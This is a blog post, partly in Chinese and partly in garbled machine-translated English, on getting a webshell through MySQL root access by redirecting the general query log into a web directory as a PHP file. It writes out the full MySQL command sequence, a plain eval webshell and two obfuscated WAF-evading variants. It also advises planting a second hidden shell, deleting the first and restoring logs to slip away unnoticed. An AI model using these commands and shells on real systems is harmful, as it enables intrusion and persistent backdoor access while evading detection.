0 × 01 Preface:
In the process of actual penetration, we are likely to encounter such a situation. It is obvious that the MySQL root permission is serious, but when we actually use the into outfile to write the shell, we can't write it in any way, provided that we have absolutely write permission for the target website directory and the MySQL root user has not been downgraded, In general, this is probably because the into outfile is disabled or WAF is blocked. I hope the following methods can help you
0 × 02 take shell:
The principle of using MySQL log file to write shell is very simple. When we open general log, every SQL executed will be automatically recorded in the log file. In this way, we can also write our shell code automatically. Operation and maintenance may usually use this to check and slow down the query, and only open it temporarily, so if you want to use it, We can only open it manually, which is why we need root permission, because it involves MySQL parameter configuration. In fact, here is a little bit of MySQL common sense, which is very clear:
先看下当前mysql默认的日志位置在什么地方,'C:\ProgramData\MySQL\MySQL Server 5.5\Data\2008R2DC.log'
顺手把原来正常的日志路径稍微记录下,等会儿干完活儿再把它恢复回来
mysql> show variables like '%general%';默认基本都是关闭的,不然这个增删改查的记录量可能会非常大
mysql> set global general_log = on;
By default, it is basically closed. Otherwise, the number of records added, deleted, modified and queried may be very large. MySQL > set global general_log = on;
此时,再将原本的日志文件位置指向到目标网站的物理路径
mysql> set global general_log_file = 'C:/Program Files (x86)/Apache Software Foundation/Apache2.2/htdocs/abouts.php';开始写shell,这里就是个普通的shell,不免杀,如果有waf的话,可以用下面的免杀shell
mysql> select '<?php eval($_POST[request]);?>';
Start to write a shell. This is a normal shell. If there is WAF, you can use the following shell MySQL > select '< PHP Eval ($_post [request]);? >';
mysql> select "<?php $sl = create_function('', @$_REQUEST['klion']);$sl();?>"; 免杀shell,eval方式
mysql> SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['klion']));?>"; 别人的免杀shell,assert&base64encode方式
0 × 03 we must deal with the future
最后,干完活儿以后务必记得把配置恢复原状,然后悄悄的离开就好
[不然,目标站如果访问量比较大,日志文件可能会瞬间暴增连shell时会巨卡]
拿到shell记得马上再传一个shell[放的隐蔽点,关于webshell隐藏细节,请参考博客相关文章]
然后再通过新的shell把最开始这个shell删掉,谨慎一点,起码不会让你的shell掉的那么快
mysql> set global general_log_file = 'C:\ProgramData\MySQL\MySQL Server 5.5\Data\2008R2DC.log';
mysql> set global general_log = off;
0 * 04 words
It's not a particularly novel skill. It's all about the mining and utilization of some basic features of MySQL itself. Your real understanding is the main thing. The utilization process may not be smooth. It's your real harvest to record the problem-solving process. Good luck
Two necessary conditions for 0 × 05 to be used successfully
事先要想办法找到目标站点的物理路径,不然要把log指向哪里呢
因为我们从外部能访问并执行webshell的地方只有目标的网站目录
当前数据库服务用户对所上面指向的目标网站目录必须能写,不然,log文件是根本没法创建的
其实,说实话,能同时满足这两点的目标并不多
如果目标网站对错误处理的很好,web服务用户和数据库用户权限隔离很清晰基本也是很难利用成功的,确实略显积累,但不失为一种好思路,非常值得拓展
像这种东西可能还是比较适合那些集成环境,比如,appserv,xampp...
因为权限全部都映射到同一个系统用户上了,如果是win平台,权限通常都比较高[实际上多数都直接是system]
Welcome to the "official account of my blog" or "direct scan code", which focuses on the personal WeChat public number "apt attack and defense guide", will usually start here, other platforms will be updated and pushed, and I have always been looking forward to learning and communicating with more like-minded friends.